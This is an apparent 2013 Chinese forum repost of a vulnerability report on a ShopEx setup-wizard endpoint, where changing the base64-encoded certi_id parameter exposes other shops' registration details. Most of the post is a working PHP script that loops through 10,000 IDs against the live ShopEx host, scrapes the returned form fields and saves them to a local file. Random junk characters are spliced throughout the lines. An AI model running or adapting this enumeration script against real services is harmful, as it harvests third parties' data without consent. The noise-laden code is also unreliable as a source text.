|
|
简要描述:$ g, l& G& z+ g) }! F+ z
ShopEx某接口缺陷,可遍历所有网站 ^- @+ E$ t# b% M
详细说明:
5 C6 O8 \7 K) k问题出现在shopex 网店使用向导页面
5 b* f/ F7 Y8 e* B1 O2 I: j; U: @1 d0 C% K+ o! _
C$ F6 `: A& w0 `1 s% k* {
# e4 n+ }' |6 _! H: Khttp://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
; F+ x% c+ o) j% H& k. c( D
5 C! ?" {; h3 Z
8 S" ?" X! C) A) J+ @/ g+ L
' j+ h% ]2 b% mrefer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
! ]# k- ^' y1 L- W! d6 S' Z/ c7 l1 K
9 I- w8 R! A, v; a, ?4 c
' Y0 r" K9 O! w A+ A
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
' A* j* s+ B7 @$ x* l/ I/ g6 E: e# _ g9 ~- Q1 c
# s' |4 i. a( S% T
3 X! ]- E3 ], d+ c<?php
+ A7 ?6 l8 n5 p
# A0 M. B+ T/ O ^% y. H! x8 | for ($i=1; $i < 10000; $i++) { //遍历
: n6 l4 V1 K: T( w# s$ F( U; j- B( ]
. q2 W( ~0 s$ ?% ]* Z4 ^' m4 s ShowshopExD($i);
0 L. z* ]& Q% E" l3 f
( }7 e/ `7 [# Y1 X6 u2 @& x }9 S- e, g& I+ {- f
* L \; j1 B! M& l+ \/ z/ T
function ShowshopExD($cid) {6 o( e8 ?4 C1 c1 ?( e# x8 u, k
3 e8 F& X5 _0 e5 S; f3 @ $url='http://guide.ecos.shopex.cn/step2.php';
m! F6 j7 Q4 q) r2 t, H6 q( @6 e, y( t; H- R: ^
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');# C; I3 H! y `$ ?8 n
8 H @7 d- V7 J
$url = $url.'?refer='.$refer;
# T/ n% \5 o/ ?8 J/ d
" W7 m e* i+ ^0 m" c $ch = curl_init($url);; A/ |5 u( o2 z! {
/ \8 @0 Z7 K7 c- J: E4 g$ I" e' P6 `
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
, X5 r# ?, B9 O. @/ M- D0 T1 J6 S* Z/ \+ x! c1 }3 P8 K
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
: _0 H Q* L# r7 m; i
. Z$ {1 b7 \) g( v- a: k. O $result = curl_exec($ch);
% m% [7 z+ M$ X' P) |2 \
1 D4 K" X* H4 f" S $result = mb_convert_encoding($result, "gb2312", "UTF-8");
' K- h t4 D* B
/ O7 a% \# w3 a2 a. Q3 i5 I7 L if(strpos($result,$refer))
( ^6 M# W% y/ Q% m: P+ n# f9 T, @) v: y" D, x# P
{
" d" G7 Q- |) w4 ^7 ]# D* }/ E
$fp = fopen("c:/shopEx.txt",'ab'); //保存文件5 d; u9 [0 k3 ^. A: ^7 z7 {
6 [/ u- k# n9 c- W% K+ B preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);/ I9 d% B/ d. V8 ?' R8 Q4 Z
; t! i; w: G2 |, s* k( Z9 J
foreach ($value[1] as $key) {
5 p, t/ b+ U# X$ q
% K3 n7 W/ p9 X. A$ m preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);6 W/ a8 _* a& ?$ X1 F; s; s/ k# E0 j4 W
8 ], h) V0 w" ^/ V. O
echo $res[1][0].':'.$res[3][0]."\r\n";
+ p# L3 Z5 u! F4 e; K
* I8 k$ ^% H# u $col =$res[1][0].':'.$res[3][0]."\r\n";
, B b% T8 F, _5 U( a# ?5 `) W8 B. d. a
fwrite($fp, $col, strlen($col)); 1 y) `( _' M- S* A( O
/ J |. v- C& V' n) H }, V5 j# N$ [3 h3 n
" W0 x( U& N- ^$ g/ l) R" _
echo '--------------------------------'."\r\n";' }" j: o/ E& Y' J9 _8 q3 Z9 z# B
1 p+ Y+ C |6 j: s7 M* b5 g fclose($fp);
& }; x9 W" d2 R6 G
$ i. {7 w+ R; e( c+ a }* E" ^1 i2 _4 I# J/ r; E) ^, @2 l( ~
0 L! k, B- R0 u9 m
flush();
% ` E9 p1 | @
, o# m+ [/ s! p! B curl_close($ch);) R! E& u Q4 y* ^
' ?) D7 D, Q9 o0 r* F: \2 P' Q
} @, A' o" U( U0 w" A+ M# b
- h8 P- H, H V8 O
?>
3 b5 N1 G0 a$ z% N5 ~2 Y漏洞证明:4 n! e' E9 k) J
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg0 U" w+ m+ J- b- f& [* F; R/ T+ o
refer换成其他加密方式
8 r. Z5 @" s' L o |
|
发表于 2013-9-21 15:59:47
收藏
支持
反对